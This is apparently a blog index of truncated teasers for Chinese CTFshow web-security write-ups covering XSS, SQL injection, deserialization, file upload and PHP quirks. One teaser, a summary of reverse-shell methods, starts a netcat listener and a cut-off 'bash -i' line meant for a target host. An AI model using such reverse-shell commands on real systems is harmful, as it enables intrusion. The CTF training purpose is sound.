CTFshow---WEB入门---(XSS)316-333 WP
题目地址:https://ctf.show/challenges写在前面:这些东西吧,看起来都挺难的,感觉难以下手(可能是我太菜了吧),不过说来说去还是需要自己动手,你不动手的话就一直不懂,自己...
CTFshow---WEB入门---(代码审计)301-310 WP
题目地址:https://ctf.show/challenges菜鸡在慢慢琢磨,现在只能说是拿得到flag,原理不太懂,有错误希望各位大佬斧正!!!web301下载附件源码,看到check.ph...
CTFshow---WEB入门---(JAVA)279-300 WP
题目地址:https://ctf.show/challenges在做这部分题的时候,其实对基础知识掌握的还是并没有那么牢固,甚至说根本不怎么懂,只能说是迷迷糊糊的拿到了flag,原理的话还是得学...
常见反弹shell总结
一、bash反弹通用① 在kali机里面开启端口监听:nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 ② 在目标主机上执行: bash -i &...
CTFshow---WEB入门---(反序列化)254-278 WP
题目地址:https://ctf.show/challenges在学习了反序列化的相关知识后,当然得做点题练习啦!!!web254直接传username=xxxxxx&password=xxxx...
php反序列化详解
刷题刷到反序列化了,完全一脸懵逼,请求Firebasky小姐姐给我讲讲,好家伙,姐姐给我推荐了php反序列化的官方文档,给我讲的也很详细,其中一句话让我顿悟了,有点醍醐灌顶的感觉,先记录记录,能...
变量覆盖漏洞学习及在webshell中的运用
1.发生的条件函数使用不当($$、extract()、parse_str()、import_request_variables()等)开启全局变量2.1定义$$代表可变变量,就是说,一个变量的变...
CTFshow---WEB入门---(SQL注入)171-253 WP
题目地址:https://ctf.show/challenges前言:这个是之后来补上的,这部分知识还是得靠自己慢慢积累,一时半会学的也不会那么懂web171//拼接sql语句查找指定ID用户$...
CTFshow---WEB入门---(文件上传)151-170 WP
题目地址:https://ctf.show/challenges我直接吐了...因为是边做题边写的博客,在开代理与关代理之间,最后在发布的时候开的本地代理,赶紧换网,然后写了一天的东西都给我没了...
CTFshow---WEB入门---(php特性)89-123 125-150plus WP
题目地址:https://ctf.show/challengesweb89hint:通过数组绕过num数组绕过payload:?num[]=0web90hint:因为我们提交的参数值默认就是字符...